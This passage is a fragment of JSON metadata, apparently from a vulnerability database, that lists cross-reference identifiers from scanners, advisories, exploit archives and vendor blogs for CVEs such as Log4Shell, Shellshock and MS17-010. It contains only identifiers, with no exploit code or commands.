"VMWARE_VCENTER_VMSA-2012-0013.NASL", "VMWARE_VMSA-2014-0010.NASL", "VMWARE_VMSA-2014-0010_REMOTE.NASL", "VMWARE_VREALIZE_OPERATIONS_MANAGER_LOG4SHELL.NBIN", "VMWARE_VSPHERE_REPLICATION_VMSA_2014_0010.NASL", "VMWARE_WORKSPACE_PORTAL_VMSA2014-0010.NASL"]}, {"type": "nmap", "idList": ["NMAP:HTTP-SHELLSHOCK.NSE", "NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "nvidia", "idList": ["NVIDIA:4386", "NVIDIA:5294", "NVIDIA:5295"]}, {"type": "openvas", "idList": ["OPENVAS:103558", "OPENVAS:1361412562310103558", "OPENVAS:1361412562310105093", "OPENVAS:1361412562310105094", "OPENVAS:1361412562310105146", "OPENVAS:1361412562310105156", "OPENVAS:1361412562310105684", "OPENVAS:1361412562310105693", "OPENVAS:1361412562310120077", "OPENVAS:1361412562310120133", "OPENVAS:1361412562310121127", "OPENVAS:1361412562310121235", "OPENVAS:1361412562310121272", "OPENVAS:1361412562310121273", "OPENVAS:1361412562310123304", "OPENVAS:1361412562310123873", "OPENVAS:1361412562310123903", "OPENVAS:1361412562310123905", "OPENVAS:1361412562310123981", "OPENVAS:1361412562310123987", "OPENVAS:1361412562310703032", "OPENVAS:1361412562310703035", "OPENVAS:136141256231071148", "OPENVAS:136141256231071486", "OPENVAS:1361412562310802082", "OPENVAS:1361412562310802085", "OPENVAS:1361412562310802086", "OPENVAS:1361412562310802738", "OPENVAS:1361412562310802947", "OPENVAS:1361412562310802948", "OPENVAS:1361412562310804489", "OPENVAS:1361412562310804490", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810686", "OPENVAS:1361412562310810687", "OPENVAS:1361412562310810688", "OPENVAS:1361412562310810689", "OPENVAS:1361412562310810690", "OPENVAS:1361412562310810692", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810850", "OPENVAS:1361412562310810851", "OPENVAS:1361412562310811231", "OPENVAS:1361412562310811232", "OPENVAS:1361412562310811233", "OPENVAS:1361412562310811451", "OPENVAS:1361412562310812083", "OPENVAS:1361412562310812148", "OPENVAS:1361412562310812202", "OPENVAS:1361412562310812209", "OPENVAS:1361412562310812607", "OPENVAS:1361412562310812614", "OPENVAS:1361412562310812618", "OPENVAS:1361412562310812623", "OPENVAS:1361412562310812624", "OPENVAS:1361412562310812708", "OPENVAS:1361412562310812730", "OPENVAS:1361412562310812731", "OPENVAS:1361412562310813336", "OPENVAS:1361412562310813338", "OPENVAS:1361412562310813339", "OPENVAS:1361412562310813340", "OPENVAS:1361412562310813341", "OPENVAS:1361412562310813342", "OPENVAS:1361412562310813346", "OPENVAS:1361412562310831669", "OPENVAS:1361412562310840909", "OPENVAS:1361412562310840919", "OPENVAS:1361412562310841080", "OPENVAS:1361412562310841127", "OPENVAS:1361412562310841984", "OPENVAS:1361412562310850206", "OPENVAS:1361412562310850615", "OPENVAS:1361412562310850616", "OPENVAS:1361412562310850618", "OPENVAS:1361412562310850676", "OPENVAS:1361412562310850768", "OPENVAS:1361412562310850778", "OPENVAS:1361412562310850890", "OPENVAS:1361412562310850945", "OPENVAS:1361412562310850988", "OPENVAS:1361412562310864455", "OPENVAS:1361412562310864457", "OPENVAS:1361412562310864471", "OPENVAS:1361412562310864472", "OPENVAS:1361412562310868208", "OPENVAS:1361412562310868211", "OPENVAS:1361412562310870753", "OPENVAS:1361412562310870755", "OPENVAS:1361412562310870777", "OPENVAS:1361412562310871248", "OPENVAS:1361412562310871250", "OPENVAS:1361412562310881127", "OPENVAS:1361412562310881152", "OPENVAS:1361412562310881229", "OPENVAS:1361412562310882027", "OPENVAS:1361412562310882028", "OPENVAS:1361412562310882030", "OPENVAS:1361412562310882031", "OPENVAS:1361412562310882032", "OPENVAS:1361412562310882033", "OPENVAS:1361412562310902829", "OPENVAS:1361412562310902954", "OPENVAS:1361412562310902955", "OPENVAS:1361412562311220191418", "OPENVAS:703032", "OPENVAS:703035", "OPENVAS:71148", "OPENVAS:71486", "OPENVAS:802738", "OPENVAS:802947", "OPENVAS:802948", "OPENVAS:831669", "OPENVAS:840909", "OPENVAS:840919", "OPENVAS:841080", "OPENVAS:841127", "OPENVAS:850206", "OPENVAS:864455", "OPENVAS:864457", "OPENVAS:864471", "OPENVAS:864472", "OPENVAS:870753", "OPENVAS:870755", "OPENVAS:870777", "OPENVAS:881127", "OPENVAS:881152", "OPENVAS:881229", "OPENVAS:902829", "OPENVAS:902954", "OPENVAS:902955"]}, {"type": "oracle", "idList": ["ORACLE:CPUAPR2020", "ORACLE:CPUAPR2021", "ORACLE:CPUJAN2020", "ORACLE:CPUJAN2022", "ORACLE:CPUJAN2023", "ORACLE:CPUJUL2019", "ORACLE:CPUJUL2020", "ORACLE:CPUJUL2021", "ORACLE:CPUJUL2023", "ORACLE:CPUOCT2022"]}, {"type": "oraclelinux", "idList": ["ELSA-2012-0135", "ELSA-2012-0322", "ELSA-2012-0729", "ELSA-2012-0730", "ELSA-2012-1009", "ELSA-2014-1293", "ELSA-2014-1294", "ELSA-2020-5439", "ELSA-2021-1647"]}, {"type": "osv", "idList": ["OSV:DLA-2463-1", "OSV:DLA-2842-1", "OSV:DLA-63-1", "OSV:DSA-2420-1", "OSV:DSA-2507-1", "OSV:DSA-3032-1", "OSV:DSA-3035-1", "OSV:DSA-5022-1", "OSV:GHSA-3QPM-H9CH-PX3C", "OSV:GHSA-7RJR-3Q55-VV33", "OSV:GHSA-FP5R-V3W9-4333", "OSV:GHSA-J3CH-VJPH-8Q6V", "OSV:GHSA-J7C3-96RF-JRRP", "OSV:GHSA-JFH8-C2JP-5V3Q", "OSV:GHSA-MF4F-J588-5XM8", "OSV:GHSA-V57X-GXFJ-484Q"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:111412", "PACKETSTORM:112176", "PACKETSTORM:114587", "PACKETSTORM:124182", "PACKETSTORM:128394", "PACKETSTORM:128395", "PACKETSTORM:128418", "PACKETSTORM:128425", "PACKETSTORM:128442", "PACKETSTORM:128443", "PACKETSTORM:128444", "PACKETSTORM:128447", "PACKETSTORM:128460", "PACKETSTORM:128481", "PACKETSTORM:128482", "PACKETSTORM:128520", "PACKETSTORM:128522", "PACKETSTORM:128554", "PACKETSTORM:128572", "PACKETSTORM:128573", "PACKETSTORM:128650", "PACKETSTORM:128878", "PACKETSTORM:129260", "PACKETSTORM:131073", "PACKETSTORM:133070", "PACKETSTORM:134594", "PACKETSTORM:137376", "PACKETSTORM:139304", "PACKETSTORM:140205", "PACKETSTORM:142181", "PACKETSTORM:142211", "PACKETSTORM:142281", "PACKETSTORM:142548", "PACKETSTORM:142602", "PACKETSTORM:142603", "PACKETSTORM:143164", "PACKETSTORM:144424", "PACKETSTORM:145226", "PACKETSTORM:146236", "PACKETSTORM:147877", "PACKETSTORM:149467", "PACKETSTORM:150687", "PACKETSTORM:152756", "PACKETSTORM:154146", "PACKETSTORM:154147", "PACKETSTORM:154176", "PACKETSTORM:154690", "PACKETSTORM:155904", "PACKETSTORM:155905", "PACKETSTORM:155930", "PACKETSTORM:155947", "PACKETSTORM:155972", "PACKETSTORM:156196", "PACKETSTORM:160127", "PACKETSTORM:161806", "PACKETSTORM:161846", "PACKETSTORM:161938", "PACKETSTORM:162610", "PACKETSTORM:162736", "PACKETSTORM:163895", "PACKETSTORM:164013", "PACKETSTORM:164122", "PACKETSTORM:165261", "PACKETSTORM:165270", "PACKETSTORM:165532", "PACKETSTORM:165642", "PACKETSTORM:165673", "PACKETSTORM:167449", "PACKETSTORM:167917", "PACKETSTORM:170178", "PACKETSTORM:171626"]}, {"type": "paloalto", "idList": ["PA-CVE-2021-44228", "PAN-SA-2014-0004"]}, {"type": "pentestpartners", "idList": ["PENTESTPARTNERS:77A7D085A837F9542DA633DA83F4A446", "PENTESTPARTNERS:8FD1C9A0D76A3084445136A0275847C0"]}, {"type": "photon", "idList": ["PHSA-2023-4.0-0413"]}, {"type": "prion", "idList": ["PRION:CVE-2021-26084", "PRION:CVE-2021-26412", "PRION:CVE-2021-26854", "PRION:CVE-2021-26855", "PRION:CVE-2021-26857", "PRION:CVE-2021-26858", "PRION:CVE-2021-27065", "PRION:CVE-2021-27078", "PRION:CVE-2021-3100", "PRION:CVE-2021-31196", "PRION:CVE-2021-31206", "PRION:CVE-2021-31207", "PRION:CVE-2021-33768", "PRION:CVE-2021-34470", "PRION:CVE-2021-34473", "PRION:CVE-2021-34523", "PRION:CVE-2021-4104", "PRION:CVE-2021-4125", "PRION:CVE-2021-44228", "PRION:CVE-2021-44530", "PRION:CVE-2021-45046", "PRION:CVE-2022-0070", "PRION:CVE-2022-23848", "PRION:CVE-2022-33915"]}, {"type": "ptsecurity", "idList": ["PT-2020-01"]}, {"type": "qt", "idList": ["QT:7EFAEDCED59EA2EE3AB98A0A484C5825"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:01C65083E501A6BAFB08FCDA1D561012", "QUALYSBLOG:09A996513FDD86534E6C20CD7200C36D", "QUALYSBLOG:0EAB7251347951045CAC549194E33673", "QUALYSBLOG:13C1A00A7D0A7B1BB16D0AB5B1E9B51A", "QUALYSBLOG:15D6ABF4D9A50D86E63BA4553A0CD3C6", "QUALYSBLOG:192411B44569225E2F2632594DC4308C", "QUALYSBLOG:1D4C1F32168D08F694C602531AEBC9D9", "QUALYSBLOG:282A52EA9B1F4C4F3F084197709217B0", "QUALYSBLOG:33FD0B08A1B2E414EAA2ADDFCDFE0EB1", "QUALYSBLOG:3B1C0CD4DA2F528B07C93411EA447658", "QUALYSBLOG:3F1898282AF38991E0B849D7A68D2A2B", "QUALYSBLOG:3FADA4B80DBBF178154C0729CFC1358F", "QUALYSBLOG:42335884011D582222F08AEF81D70B94", "QUALYSBLOG:479A14480548534CBF2C80AFA3FFC840", "QUALYSBLOG:5059D1C3913FB6542F3283A66F9B3A43", "QUALYSBLOG:56A00F45A170AF95CF38191399649A4C", "QUALYSBLOG:59B6B05F4B3E0D2763A297E5D21C3175", "QUALYSBLOG:5A5094DBFA525D07EBC3EBA036CDF81A", "QUALYSBLOG:5F3A665821FA30373004EC52F5104E15", "QUALYSBLOG:5FAC1C82A388DBB84ECD7CD43450B624", "QUALYSBLOG:6652DB89D03D8AA145C2F888B5590E3F", "QUALYSBLOG:68BBBF644900DA0A883AABB0E4E3F28B", "QUALYSBLOG:6C71B912ABF74BE51F014EC90669CF30", "QUALYSBLOG:82E24C28622F0C96140EDD88C6BD8F54", "QUALYSBLOG:8DC9B53E981BBE193F6EC369D7FA85F8", "QUALYSBLOG:97274435F9F49556ED060635FD9081E2", "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4", "QUALYSBLOG:9D071EBE42634FFBB58CB68A83252B41", "QUALYSBLOG:9E3CACCA2916D132C2D630A8C15119F3", "QUALYSBLOG:A0F20902D80081B44813D92C6DCCDAAF", "QUALYSBLOG:A730164ABD0AA0A58D62EAFAB48628AD", "QUALYSBLOG:A8EE36FB3E891C73934CB1C60E3B3D41", "QUALYSBLOG:AF3D80BA12D4BBA1EE3BE23A5E730B6C", "QUALYSBLOG:B0EFD469309D1127FA70F0A42934D5BC", "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A", "QUALYSBLOG:C2ECE416E32C6CC230B13471D41A4E03", "QUALYSBLOG:C3C14B989683A02C2C9A98CE918FBC3C", "QUALYSBLOG:CAF5B766E6B0E6C1A5ADF56D442E7BB2", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:D38E3F9D341C222CBFEA0B99AD50C439", "QUALYSBLOG:DC0F3E59C4DA6EB885E6BCAB292BCA7D", "QUALYSBLOG:DE1FEC2B9B661D42DAA0BA398DBFD24E", "QUALYSBLOG:E908D08D4163FD6817C8B71F91A20C57", "QUALYSBLOG:FFC962F3C57B514805A24EA07FF565A1"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:02EDDA927928C11A6D10A4A0D17823AF", "RAPID7BLOG:03B1EB65D8A7CFE486943E2472225BA1", "RAPID7BLOG:0576BE6110654A3F9BF7B9DE1118A10A", "RAPID7BLOG:05A653A5E863B78EDD56FD74F059E02E", "RAPID7BLOG:078D5EE222682A75AE1A1A3A3684E38D", "RAPID7BLOG:0C3EDBDC537092A20C850F762D5A5856", "RAPID7BLOG:0C5C51ED53983B92C7C9805E820366C9", "RAPID7BLOG:18CF89AA3B9772E6A572177134F45F3A", "RAPID7BLOG:18D49792276E208F17E7D64BCE2FDEF6", "RAPID7BLOG:1D39E7BBA13704DCBB8153C89ABE6B72", "RAPID7BLOG:24E0BE5176F6D3963E1824AD4A55019E", "RAPID7BLOG:2FC92FBE5A4445611C80C7C3FA7D9354", "RAPID7BLOG:2FFDE45F01FA44216BE91DD7AFA0D060", "RAPID7BLOG:3538F350FD08E0CFD124821C57A21C64", "RAPID7BLOG:396ACAA896DDC62391C1F6CBEDA04085", "RAPID7BLOG:44EA89871AFF6881B909B9FD0E07034F", "RAPID7BLOG:45B045D2EE21432DF9939E4402522BFC", "RAPID7BLOG:486F801929E1F794197FC08AE13E4CB5", "RAPID7BLOG:49C18614AD01B6865616A65F734B9F71", "RAPID7BLOG:4B35B23167A9D5E016537F6A81E4E9D4", "RAPID7BLOG:4CDB288231FA4BF52C0067D9D4FEABBF", "RAPID7BLOG:4E867F9E4F1818A4F797C0C8A1E26598", "RAPID7BLOG:5109AC30126DB59333F13ED32F7F4713", "RAPID7BLOG:5586742AC0F1C66F56B3583482B0960A", "RAPID7BLOG:5721EC0F74BC2FA3F661282E284C798A", "RAPID7BLOG:5CDF95FB2AC31414FD390E0E0A47E057", "RAPID7BLOG:602109CBDD808C41E4DDC9FBC55E144D", "RAPID7BLOG:6A1F743B64899419F505BFE243BD179F", "RAPID7BLOG:6C0062981975551A3565CCAD248A1573", "RAPID7BLOG:6EADCD983283E3D546EF2907978E95F1", "RAPID7BLOG:6F833E0DB9E152EB8397D33430FECB7F", "RAPID7BLOG:755102CA788DC2D430C6890A3E9B1040", "RAPID7BLOG:7767347A5784FF1C4901601A1A21D2C8", "RAPID7BLOG:7B1DD656DC72802EE7230867267A5A16", "RAPID7BLOG:7F1312E79E0925118565C90443170051", "RAPID7BLOG:8882BFA669B38BCF7B5A8A26F657F735", "RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53", "RAPID7BLOG:97E3CA7ED938F3DF6E967C832F314FA3", "RAPID7BLOG:9CB105938BDE92F573A2DE68BC20CF46", "RAPID7BLOG:A567BCDA66AFFA88D0476719CB5D934D", "RAPID7BLOG:A94573CD34833AE3602C45D8FAA89AD4", "RAPID7BLOG:AB5C0BC130F45073226CC41D25680EA0", "RAPID7BLOG:AF9E6199C63A57B22FAE6AAEDD650D39", "RAPID7BLOG:B6DE24165AA9AA83EDA117170EDDAD44", "RAPID7BLOG:BE60EE9A1ACB3CEE4593041ECAFA8D95", "RAPID7BLOG:C628D3D68DF3AE5A40A1F0C9DFA38860", "RAPID7BLOG:C6C1B8357ABD28AEB0F423A0A099098A", "RAPID7BLOG:C90DF07E98E436DFBFCC5BA576D21019", "RAPID7BLOG:CB62092B4C7E70876CF276BA04DD7597", "RAPID7BLOG:D185BF677E20E357AFE422CFB80809A5", "RAPID7BLOG:D1E1A150733F5AFC2C704DB26E7EAB30", "RAPID7BLOG:D435EE51E7D9443C43ADC937A046683C", "RAPID7BLOG:D47FB88807F2041B8820156ECFB85720", "RAPID7BLOG:E3D08ECAA9A93569D5544F4D6AAEEB74", "RAPID7BLOG:E43819A7DE1DD0F60E63E67A27B9301B", "RAPID7BLOG:ED80467D2D29D8DC10E754C9EA19D9AD", "RAPID7BLOG:F14526C6852230A4E4CF44ADE151DF49", "RAPID7BLOG:F14E17E573386DB3DDD27A8E829E49A1", "RAPID7BLOG:F216985E1720C28CCE9E1F41AD704502", "RAPID7BLOG:F37BD0C67170721734A26D15E6D99B3E", "RAPID7BLOG:F4F1A7CFCF2440B1B23C1904402DDAF2", "RAPID7BLOG:F76EF7D6AB9EB07FC8B8BCE442DC3A69", "RAPID7BLOG:F9B4F18ABE4C32CD54C3878DD17A8630", "RAPID7BLOG:FB97B7B381BE98BE0077666DFDEC1953", "RAPID7BLOG:FBEE52CB3C438E4C42D6212E07BEFEA9"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:BDA3EA90B57FC8895B98DAADBAE3D7DE", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:DADF9A5B22CCB70155177EBC2E86131E"]}, {"type": "redhat", "idList": ["RHSA-2012:0135", "RHSA-2012:0139", "RHSA-2012:0322", "RHSA-2012:0508", "RHSA-2012:0514", "RHSA-2012:0729", "RHSA-2012:0730", "RHSA-2012:0734", "RHSA-2012:1009", "RHSA-2012:1019", "RHSA-2013:1455", "RHSA-2014:1293", "RHSA-2014:1294", "RHSA-2014:1295", "RHSA-2014:1306", "RHSA-2014:1311", "RHSA-2014:1312", "RHSA-2014:1354", "RHSA-2014:1865", "RHSA-2020:5439", "RHSA-2021:1647", "RHSA-2021:3723", "RHSA-2021:5093", "RHSA-2021:5094", "RHSA-2021:5106", "RHSA-2021:5107", "RHSA-2021:5108", "RHSA-2021:5126", "RHSA-2021:5127", "RHSA-2021:5128", "RHSA-2021:5129", "RHSA-2021:5130", "RHSA-2021:5132", "RHSA-2021:5133", "RHSA-2021:5134", "RHSA-2021:5137", "RHSA-2021:5138", "RHSA-2021:5140", "RHSA-2021:5141", "RHSA-2021:5148", "RHSA-2021:5183", "RHSA-2021:5184", "RHSA-2021:5186", "RHSA-2022:0082", "RHSA-2022:0083", "RHSA-2022:0203", "RHSA-2022:0205", "RHSA-2022:0216", "RHSA-2022:0222", "RHSA-2022:0223", "RHSA-2022:0296", "RHSA-2022:1296", "RHSA-2022:1297", "RHSA-2022:1299"]}, {"type": "redhatcve", "idList": ["RH:CVE-2020-1472", "RH:CVE-2021-4104", "RH:CVE-2021-4125", "RH:CVE-2021-44228", "RH:CVE-2021-44832", "RH:CVE-2021-45046", "RH:CVE-2021-45105"]}, {"type": "rocky", "idList": ["RLSA-2021:1647"]}, {"type": "rosalinux", "idList": ["ROSA-SA-2021-1967"]}, {"type": "saint", "idList": ["SAINT:0FABA93E56CFEDDCAFAA28589FA1F1A2", "SAINT:115143B4FAD70F6ECA6FF95A951FEA51", "SAINT:192E33BC51A49F81EC3C52F0E8A72432", "SAINT:2232AFF7B86AF6E40FEC6191FAD74DCC", "SAINT:2837E3FFCA88074AEA3D7A814D67BEC2", "SAINT:2A2447E1BCC3EED8CC15036CFE02E6AD", "SAINT:2AE124BF9DEB7BF62DF04248DEE949D2", "SAINT:2E3ECAFB8AE7339B98B8B66F6B3CB6B6", "SAINT:3367EB0908CC68021EF65D9C41812230", "SAINT:37548F7E4861F75CE2B72672750C1CB3", "SAINT:3A3289A18B5C46A88581C9E8D4D0CF5A", "SAINT:3AC97F44417F65DD9B8ED9D1C038C29A", "SAINT:470A2F98A76AC3CFA038BD8E6D288DEE", "SAINT:49E3C4DD42AD3A5B772ACBDD5C6E1DBD", "SAINT:58DAD69110330F9994F6C382A9E66468", "SAINT:5BBB36CD07D0D401F363CA3F726533A5", "SAINT:5C86AB1074A96B306662C51ADE6F4B61", "SAINT:5DC0FF1D23C8E8C36A1A8D72F1EB2B74", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:6558E3E080367BA482316AE6D48877BA", "SAINT:691FBFDFE24704CB1E9FB73F0186260A", "SAINT:7C12BAFAA5D8DBBC0D183D44EB230ABB", "SAINT:862F3D5093666FCD7985C6448451D516", "SAINT:8E748D4A2FD6DFA108D87FF09FFEF2AE", "SAINT:971EC32171AA6C1A297967F23E22D12A", "SAINT:9764B1C9A7FFDFC322F184608200C05E", "SAINT:9D4369A8D6921FF2F218653A934F5F00", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:A192C3991EB7069FAA4A6A96BA76C435", "SAINT:AC0FD49ED1D431C39796A2464B457CF8", "SAINT:AF0C718105190997E9F68ECCA01B467D", "SAINT:B20ACFE275443E794149275B36EB8F99", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:D79A7CB8B12034409DA174D1F0EC34F3", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:DB6048DE08200736030664D3F0E6C764", "SAINT:E7D41DAA0FE2CCB57388A4812EEC9C00", "SAINT:EA7480D87E33A13B3179AF9B56E84AFC", "SAINT:FA42FF32EDF77D4600EA8685EBDE9D45"]}, {"type": "samba", "idList": ["SAMBA:CVE-2020-1472", "SAMBA:CVE-2022-38023"]}, {"type": "securelist", "idList": ["SECURELIST:03923D895F0F0B7EB3A51F48002D1416", "SECURELIST:094B9FCE59977DD96C94BBF6A95D339E", "SECURELIST:0C40BC07DFF80D4B158D166D0DC2C870", "SECURELIST:0D5B4F09314C45AF952E2FD68F88B8D0", "SECURELIST:0EC04669D1B4F9900C7ED36BB8AFB1A2", "SECURELIST:0ED76DA480D73D593C82769757DFD87A", "SECURELIST:11665FFD7075FB9D59316195101DE894", "SECURELIST:163368D119719D834280EA969EDB785D", "SECURELIST:1670EF82924C5F24DC777CBD3BA4AE5E", "SECURELIST:1CDC71C188E5925A3F6040BF90E18BD2", "SECURELIST:20C7BC6E3C43CD3D939A2E3EAE01D4C1", "SECURELIST:2625ABE43A309D7E388C4F0EBCA62244", "SECURELIST:29152837444B2A7E5A9B9FCB107DAB36", "SECURELIST:2E379BD626ECA8E38B18EDCA6CD22F3C", "SECURELIST:322E7EEAE549CDB14513C2EDB141B8BA", "SECURELIST:35644FF079836082B5B728F8E95F0EDD", "SECURELIST:375240F06A95008FE7F1C49E97EEC5AF", "SECURELIST:376CB760FDD4E056A8D0695A9EB9756A", "SECURELIST:3DB11A5605F77743FA5F931DF816A83C", "SECURELIST:403B2D76CFDBDAB0862F6860A95E54B4", "SECURELIST:45427EE61DFCFA843ED5C3F7CAB026A1", "SECURELIST:45BAFC60F3E2EFDD0D35C99D042559B4", "SECURELIST:48D15DFCBE9043594D59B08C3C4F3A21", "SECURELIST:49E48EDB41EB48E2FCD169A511E8AACD", "SECURELIST:4A1162E18E20A1A1E0F057FE02B3AE75", "SECURELIST:4FE9AF32AEB194433587B75288D50FDA", "SECURELIST:5147443B0EBD7DFCCB942AD0E2F92CCF", "SECURELIST:52D1B0F6F56EE960CC02B969556539D6", "SECURELIST:53EC9FA168E0493828018AA0C1B799C0", "SECURELIST:5954DE9617729B891A2B0FD0E3FF9E66", "SECURELIST:5F58A2B6A05CED1E343735029CE88CC2", "SECURELIST:63AD9BC433286AAD504D73797903AF90", "SECURELIST:652E2EF2009E38562770BCAC629BEA2E", "SECURELIST:6C418779587ADE032AB673F44440002B", "SECURELIST:6FF73BA3D8BB759BAC6F6A8B20F0F19D", "SECURELIST:70BCDF20EABD280713CFF28CEE3C6374", "SECURELIST:7286FDD05AF03323AEA8EDD25DF1604F", "SECURELIST:73735B62C781261398E44FFF82262BCD", "SECURELIST:75F0B75D28318C525992E42495D8C5EE", "SECURELIST:78C1216872C5187377E9C874AEDF73FC", "SECURELIST:78FB952921DD97BAF55DA33811CB6FE4", "SECURELIST:7A375F44156FACA25A0B3990F2CD73C1", "SECURELIST:7F5AA1EA9018F295D1D8A9882EA0F724", "SECURELIST:833C831E498502BB46DD03F0C6F4D597", "SECURELIST:847981DCB9E90C51F963EE1727E40915", "SECURELIST:8499F8DA2C6A39EA56D9B664EE7B6360", "SECURELIST:934E8AA177A27150B87EC15F920BF350", "SECURELIST:967D8B65D5D554FFB5B46411F654A78A", "SECURELIST:9B6F07B15AEDE81CE353FC4D91FF6329", "SECURELIST:9CC623A02615C07A9CEABD0C58DE7931", "SECURELIST:9CEE13B3A189B3DBB187C6946786F480", "SECURELIST:9E653409B4D8C46D45939FA37442E456", "SECURELIST:9E89F9F48CFED14FAC92E1E9861C2576", "SECURELIST:A2A995C1C898D3DA4DB008FBA6AA149E", "SECURELIST:A3CEAF1114E104F14254F7AF77D7D080", "SECURELIST:A4072107882E39592149B0DB12585D70", "SECURELIST:A71E207678429F2F49013A82A5A5EED4", "SECURELIST:A823F31C04C74DD103337324E6D218C9", "SECURELIST:A8F3F69CF813489328C595DD79397487", "SECURELIST:A9EBC6A1BD7D7A743024BD012EAC8323", "SECURELIST:ADE333FF4D3F96FCD027E6BB825FFD9B", "SECURELIST:AFE852637D783B450E3C6DA74A37A5AB", "SECURELIST:B7116025A4E34CF6B9FED5843F7CDCD4", "SECURELIST:BB0230F9CE86B3F1994060AA0A809C08", "SECURELIST:C1F2E1B6711C8D84F3E78D203B3CE837", "SECURELIST:C50F1C7ECAFB8BD5FDEDAA29493B81A6", "SECURELIST:C540EBB7FD8B7FB9E54E119E88DB5C48", "SECURELIST:CE501995262A06F4E132DE2F9C2B9B6C", "SECURELIST:CE954DA57A5EE857B62F0E00D36A5003", "SECURELIST:CE9654E321FEC18D47DA16E0CF9D0CCE", "SECURELIST:D0FFA6E46D43B7A592C34676F2EF3EDB", "SECURELIST:D3F258CC3CAC108A409150AE598738D9", "SECURELIST:D7795824A5A02E1E45E51294D78CEBC2", "SECURELIST:DA58D4888BE428D1D0C529B16E07E85D", "SECURELIST:DF3251CC204DECD6F24CA93B7A5701E1", "SECURELIST:E21F9D6D3E5AFD65C99FC385D4B5F1DC", "SECURELIST:E9DB961C0B1E8B26B305F963059D717E", "SECURELIST:F05B277B9FBC7AA810A2092CB58DEF37", "SECURELIST:F1FC61836DCAA7F1E27411092B208523", "SECURELIST:F4445BFDE49DF55279E5B69E613E7CA2", "SECURELIST:F62AEEAB0355FAC92D225F808BBF00CD", "SECURELIST:F6E885706A3B59254C617CE5C255F27B", "SECURELIST:FA58963C07F2F288FA3096096F60BCF3", "SECURELIST:FC1216FC2096CBEE31E247C19D68BEC5", "SECURELIST:FD71ACDBBCF57BD4C7DE182D2309BF9D"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:29990", "SECURITYVULNS:DOC:31100", "SECURITYVULNS:DOC:31102", "SECURITYVULNS:DOC:31103", "SECURITYVULNS:DOC:31125", "SECURITYVULNS:DOC:31129", "SECURITYVULNS:DOC:31130", "SECURITYVULNS:DOC:31131", "SECURITYVULNS:DOC:31135", "SECURITYVULNS:DOC:31147", "SECURITYVULNS:DOC:31150", "SECURITYVULNS:DOC:31299", "SECURITYVULNS:DOC:32393", "SECURITYVULNS:VULN:12205", "SECURITYVULNS:VULN:12320", "SECURITYVULNS:VULN:12948", "SECURITYVULNS:VULN:13337", "SECURITYVULNS:VULN:13977", "SECURITYVULNS:VULN:14050"]}, {"type": "seebug", "idList": ["SSV:30150", "SSV:60220", "SSV:72735", "SSV:73633", "SSV:83333", "SSV:87270", "SSV:87294", "SSV:87317", "SSV:87331", "SSV:88877", "SSV:90202", "SSV:92935", "SSV:92952", "SSV:96484"]}, {"type": "slackware", "idList": ["SSA-2014-267-01", "SSA-2014-272-01"]}, {"type": "srcincite", "idList": ["SRC-2019-0009", "SRC-2019-0010"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2012:0828-1", "OPENSUSE-SU-2014:1226-1", "OPENSUSE-SU-2014:1229-1", "OPENSUSE-SU-2014:1238-1", "OPENSUSE-SU-2014:1242-1", "OPENSUSE-SU-2014:1254-1", "OPENSUSE-SU-2020:1513-1", "OPENSUSE-SU-2020:1526-1", "OPENSUSE-SU-2021:1577-1", "OPENSUSE-SU-2021:1586-1", "OPENSUSE-SU-2021:1601-1", "OPENSUSE-SU-2021:1613-1", "OPENSUSE-SU-2021:3999-1", "OPENSUSE-SU-2021:4094-1", "OPENSUSE-SU-2021:4107-1", "OPENSUSE-SU-2021:4109-1", "SUSE-SU-2012:0602-1", "SUSE-SU-2012:0603-1", "SUSE-SU-2012:0762-1", "SUSE-SU-2014:1212-1", "SUSE-SU-2014:1213-1", "SUSE-SU-2014:1214-1", "SUSE-SU-2014:1223-1", "SUSE-SU-2014:1247-1", "SUSE-SU-2014:1247-2", "SUSE-SU-2014:1259-1", "SUSE-SU-2014:1260-1", "SUSE-SU-2014:1287-1", "SUSE-SU-2017:2699-1", "SUSE-SU-2017:2700-1"]}, {"type": "symantec", "idList": ["SMNTC-101757", "SMNTC-102347", "SMNTC-103998", "SMNTC-108822", "SMNTC-111238", "SMNTC-19793", "SMNTC-52161", "SMNTC-53960", "SMNTC-58327", "SMNTC-70103", "SMNTC-96703", "SMNTC-96704", "SMNTC-96705", "SMNTC-99445"]}, {"type": "talosblog", "idList": ["TALOSBLOG:0AA83DE1427426ABF4723FDF049F6EEB", "TALOSBLOG:224F6FF67DED69B2FFFA483B3490BCE0", "TALOSBLOG:311242B8285F529AAB4833CDEBC9989C", "TALOSBLOG:3E4DED1D580BBFDD5A456042C03F6483", "TALOSBLOG:422E9F3F2D27B5C62D821C614EBE60A6", "TALOSBLOG:5AED45D6F563E6F048D9FCACECC650CC", "TALOSBLOG:7192A351B37E9A67C1A5DB760A14DA7E", "TALOSBLOG:7A681329F7813E49DED3E928ED08D453", 